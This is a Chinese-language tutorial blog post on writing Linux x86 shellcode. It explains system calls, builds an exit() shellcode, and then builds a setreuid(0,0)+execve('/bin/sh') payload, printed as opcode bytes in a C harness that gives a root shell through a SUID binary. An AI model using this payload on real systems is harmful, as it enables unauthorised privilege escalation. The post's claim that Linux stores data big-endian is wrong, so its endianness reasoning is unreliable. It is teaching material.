2015/5/18 16:20:18
前面我们介绍了shellcode使用的基本策略,包括基本的shellcode、反向连接的shellcode以及查找套接字的shellcode。在宏观上了解了shellcode之后,今天我们来深入一步,看看shellcode到底是什么。也许大家和我一样,从接触安全领域就听说shellcode,也模糊地知道shellcode基本就是那个攻击载荷,但是shellcode到底长什么样,却一直遮遮掩掩,难睹真容。趁今天这个机会,我们一起来揭开shellcode的神秘面纱吧!本节要点如下:
- Linux系统调用方式
- shellcode的构造
- 一个具体的shellcode实例
好了,闲言少叙,接下来我们一起进入正题吧!
一、Linux系统调用方式
我们多少都知道,shellcode在缓冲区攻击的组合三明治中作为关键的攻击载荷存在,漏洞攻击获取了操纵EIP寄存器后执行的最终代码就是我们的shellcode。既然shellcode是攻击功能的主要实现,那么自然少不了各种系统功能,如最初的返回一个交互shell,如自动下载一个文件,如自动安插一个后门,等等。而这些操作无一不需要操作系统的鼎力配合。
操作系统配合的方式是提供了系统调用接口,Windows下称作系统API,也就是我们前一章提到的系统内存分为用户态和内核态,系统调用存在内核态中,而调用接口则提供给用户态的用户进程,当然也包括我们的shellcode。
- 关于系统调用
不同的操作系统中系统调用的实现方式会有不同,比如Winodws中就使用的API方式。这里我们的系统是Linux,因此先来介绍Linux中系统调用的基本知识。
一般操作系统提供系统调用有三种方式:
- 硬件中断:比如来自键盘的异步信号;
- 硬件陷阱:比如非法的“除以0”错误结果;
- 软件陷阱:比如进程请求调度执行;
Linux系统采用的是第三种,即软件陷阱的方式,具体方式就是定义了一个系统调用函数表syscalltable,用于按照顺序组织每个系统调用在内核中的位置;同时Linux还定义了系统调用号,对应着syscalltable中的索引号,这样,我们每次需要系统调用的时候,只需要传递给系统调用号,然后系统调用会自动找到相对应的内核位置,运行该函数。
更为详尽的介绍可以参看CU博友的相关文章:http://blog.chinaunix.net/uid-7547035-id-60054.html
二、shellcode的构造
我们直觉上应该能知道shellcode是机器可以识别的二进制机器码,因此自然有三种方式可以构造shellcode:
- 直接写16进制操作码
- 采用C语言这样的高级语言编写程序,编译链接后再反汇编获取汇编指令和16进制操作码;
- 编写汇编程序,汇编后利用objdump从中提取出16进制操作码
大家一般不会选择第一种方式,可能倾向于第二种的朋友比较多,但是实际上,最为实用的是第三种。这里大家要区分汇编语言依旧不是机器码,每个CPU都有自己特定的操作码集合,这些集合都利用32位的机器码来表示,因此我们的最终目标是获得执行功能的机器码,具体到我们今天的例子,就是来获取一个执行系统调用的机器操作码。
在汇编语言层测,主要通过加载特定寄存器值的方式进行系统调用:
- 在eax中加载体统调用使用的16进制值,即系统调用号,syscalltable中的索引;
- 在ebx存放第1个参数,在ecx中存放第2个参数,在edx中存放第3个参数,在esi和edi中存放第4、5个参数,Linux系统调用最多支持5个单独参数;
- 若实际参数超过5个,那么使用一个参数数组,并且将该数组的地址存放在ebx中;
为了说明为什么直接利用汇编来写shellcode更为实用,我们来引入一个简单的调用系统函数exit()的C程序,如下:
//exit.c #includeint main() { exit(0); }
在Linux下记得不要加入"system("pause")"这样的命令,这个只在Windows下才能识别,Linux下会报错。接下来我们利用gcc进行编译,运行后查看反汇编的代码:
这里我们设置了断点,只查看main函数中的代码,忽略了函数开场白和收场白,注意汇编代码<+4>和<+9>的两行代码,它们是系统在调用exitgroup()这个系统调用,该调用时确保进程退出所在的线程组;接下来的<+15>和<+20>则是我们关于exit(0)的调用。这里采用的是gcc的动态编译,因此调用exitgroup时使用的是call的形式,如果采用static形式编译,那么则会和exit一样是0x80的形式,这里用0x80表示一个系统软中断。
细心的朋友一定发现采用C编译的问题,就是引入了编译器优化的其他系统调用,我们必须进行区分筛选构造shellcode,而在汇编代码中找到我们的系统调用码有时并不容易,因此我们推荐更为直接,也是更为实用的第三种方式:直接使用汇编语言编写shellcode。
这里我们只需要简单几句汇编语句即可:
;exit.asm section .text global _start _start: xor eax, eax ; 初始化eax为0 xor ebx, ebx ; 初始化ebx为0 mov al, 0x01 ; 放入exit的系统调用号“1” int 0x80;
这里需要注意的是mov al, 0x01 没有直接使用eax,而是eax的8位版本al,即最低的8位寄存器,因为Linux下默认是大端存储 ,即高位数据会存放在低位内存上(无论大端还是小端,都是从内存低地址向高地址存放数据,只是先存高位数据还是低位数据的问题,书写上,一般左侧是高位,右侧是低位)。如果是EAX寄存器,那么就会是【(高内存)01 00 00 00(低内存)】,因此我们需要采用al寄存器。
利用nasm和ld对我们的汇编程序进行汇编和链接,然后运行测试,使用strace来查看系统调用:
实验证明我们成功调用了exit()函数。接下来的工作就是从中提取出操作码,然后嵌入到攻击载荷中就可以了,下面我们以一个简单的shellcode来进行说明。
三、一个具体的shellcode实例
1. 明确系统调用
在具体构造一个shellcode之前,我们需要明确shellcode要实现的系统调用。这里我们引入两个系统调用setreuid(0,0)和execve:
- setreuid(0,0)系统调用主要用来交换Linux进程的实际用户ID和有效用户ID。每个Linux进程都有有两个相关的用户ID:实际用户ID(即ruid)和有效用户ID(即euid),其中ruid表示了该进程由谁运行,即当前系统环境用户是谁,主要回答who am I?的问题;而euid则用来规范进程的实际权限控制。比如passwd文件存放了用户名和密码,当一个普通用户运行passwd时,其ruid是自己,而euid则临时变为了文件的所有者root。这主要是设置SUID来实现的,而setreuid的作用在于交换ruid和euid;
- execve系统调用用于启动一个具体的可执行文件,一般需要三个参数:eax中存放系统调用号0xb;ebx中存放一个字符串的地址;ecx中还是上面的地址;edx中0x0;
关于setreuid的一个参考:http://blog.csdn.net/hittata/article/details/8670208
接下来我们shellcode的思路是:
- 创建一个调用shellcode字符串的C程序文件se_r,意思为包含setreuid+execve两个系统调用的测试文件;
- 为se_r赋予root所有者,添加SUID位;
- 普通用户运行se_r,运行时euid会变为root,而setreuid会交换ruid和euid,因此当程序执行完毕后实际用户成为了root;
我们不再采用C语言来编写shellcode,而是直接采用汇编语言:
section .text global _start _start: ;setreuid(0,0) xor eax, eax mov al, 0x46 ;setreuid的系统调用号 xor ebx, ebx xor ecx, ecx int 0x80 ;系统调用 ;spawn shellcode with execve xor eax, eax push eax push 0x68732f2f ;逆序压入“//sh” push 0x6e69622f :逆序压入“/bin” mov ebx, esp push eax push ebx mov ecx, esp xor edx, edx mov al, 0xb int 0x80
这里逆序压入也是因为是大端输入的问题,采用两个“//”是为了4个字节的对齐。
我们汇编、链接上面的文件,设置所有者为root,添加SUID权限后运行:
可以看到得到了root的shell。
我们的shellcode通过测试之后,接下来要从中提取出我们的操作码,这里主要利用objump命令:
主要检查下操作码中不要有0x0这样的字符,因为系统会意外中止,检查没有后,我们开始写一个C程序加进我们的shellcode,即POC:
char sc[] = //setreuid(0,0) "\x31\xc0" "\xb0\x46" "\x31\xdb" "\x31\xc9" "\xcd\x80" //spawn shellcode with execve "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x31\xd2" "\xb0\x0b" "\xcd\x80"; int main() { void (*fp) (void); fp = (void *)sc; fp(); }
Refer: Gray Hat Hacking: The Ethical Hacker's Handbook, Third Edition